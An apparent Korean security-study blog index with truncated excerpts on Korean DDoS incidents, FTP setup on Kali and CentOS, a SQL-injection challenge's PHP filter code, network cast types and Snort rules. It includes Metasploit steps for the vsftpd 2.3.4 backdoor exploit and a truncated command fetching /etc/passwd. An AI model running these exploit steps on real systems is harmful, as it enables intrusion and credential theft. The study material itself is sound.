EASY7

2013년 1.25 대란 1.25~30 공격 유형 : 트래픽 과다(슬래머웜) 국내 인터넷망 전체 장애 1,875억원 피해 2009년 7.7 DDoS 대란 미국 독립 기념일(7월 4일) 기점으로 공격이 감지되기 시작하여 7월 7일에 DDOS 공격이 본격적으로 감행되었다. 국가기관, 포털, 금융, 보안 사이트 등 범국가적인 위험 수위까지 근접했었던 초유의 비상사태! 이때 이후로 국민들에게 DDoS와 악성코드 감염된 봇넷의 위험성을 각인시키게 된 계기가 되었다. 2011년 3.4 DDoS 3.4~7 국내외 36개 기관 웹서버 11만대 감염 PC파괴 농협해킹 4.12~ 30 APT 내부전산망 서버 서버 파괴(270대) 197억원 피해 2012년 핵티비즘 : 정치적인 의사를 표시하기 위함. 4.11 총선과 12...

FTP backdoor AttackFTP 2.3.4 command execution msfconsole use exploit/unix/ftp/vsftpd_234_backdoor set rhost ip주소 set rport 21 run -j sessions : 연결된 세션 확인 session -i 세션id

https://www.youtube.com/watch?v=ptu4Nfn5jGI ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule 'FTP Bounce Port Scanner', 'Description' => %q{ Enumerate TCP services via the FTP bounce PORT/LIST method. }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE ) register_options([ OptSt..

kali에서 FTP 깔기 1. ftp 설치하기 apt-get install ftp 2. vsftp 설치하기 apt-get install -y vsftpd 3. 설정 변경 nano /etc/vsftpd.conf 수정해야할 것. local_enable=yes (로컬 계정 접근 허용) write_enable=yes (로컬 계정 쓰기 허용) local_umask=022 (로컬 계정 umask) 각종 설정의 설명 anonymous_enable=NO (anonymous FTP 허용여부) local_enable=YES (로컬 계정 접근 허용) write_enable=YES (로컬 계정 쓰기 허용) local_umask=022 (로컬 계정 umask) xferlog_enable=YES (파일 전송 로그) xferlog..

CentOS에서 FTP 설치하기 1. ftp가 설치되어있는지 확인 rpm -qa | grep ftp 2. 설치 안되어있다면 vsftpd와 ftp 설치하기 vsftpd는 FTP서버를 사용할 수 있도록 해주는 데몬이며, ftp는 ftp 접속이 가능하도록 해주는 client 프로그램이다. yum install -y vsftpd ftp 3. 서비스 실행(부팅할 때마다 해줘야함) /etc/rc.d/init.d/vsftpd start (= service vsftpd start) 부팅시 자동으로 ftp 서버가 동작하도록 하려면 레벨을 조정해주면 된다. chkconfig --level 2345 vsftpd on 4. 제대로 작동 중인지 확인 netstat -atunp | grep vsftpd get /etc/passw..

include "./config.php";   login_chk();   dbconnect();   if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");   if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");   if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");   $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";   echo "query : {$query}";   $result = @mysql_fetch_arr..

캐스트 -유니캐스트(Unicast) 1:1 통신 방법으로 MAC 주소가 지정해서 보내는 방식이다. 노드들은 자신의 MAC주소가 아닌 경우 패킷이 CPU까지 전송되지 않고 LAN카드에서 버린다. 공격방법: arpspoofing -브로드캐스트(Broadcast)-UDP사용 하나의 네트워크 전체의 통신 방법이다. 노드들은 거부권이 없으며 무조건 수신하고 본다. 유니캐스트와 다르게 무조건 받아들이기 때문에 CPU까지 패킷이 올라가게 되고 컴퓨터 부하가 걸릴 수 있다. 대표적인 예는 ARP이며 IP주소는 알고 잇지만 MAC주소를 모를 때 사용한다. 공격방법은 Promiscous 모드를 이용해 sniffing이다. -멀티캐스트(Multicast) 그룹을 나누어 그 그룹에 속한 호스트들에게 한번에 데이터를 전송한다...

kali에서 snort 사용하기 실시간 트래픽 분석과 패킷을 기록하는 침입방지시스템(IPS) 오픈소스이다. root@kali:~# apt-get update root@kali:~# apt-get install snort root@kali:~# snort --version root@kali:~# gedit /etc/snort/snort.conf 이 파일에서 rule이 적힌 파일의 이름을 설정할 수 있다. root@kali:~# snort -c /etc/snort/rules/local.rules alert icmp any any -> any any (msg:"ICMP PING TEST"; sid:100001;) 룰 추가 #snort -> 감지 중~ -> ctrl+c ...더보기 다른 창에서 ping 000...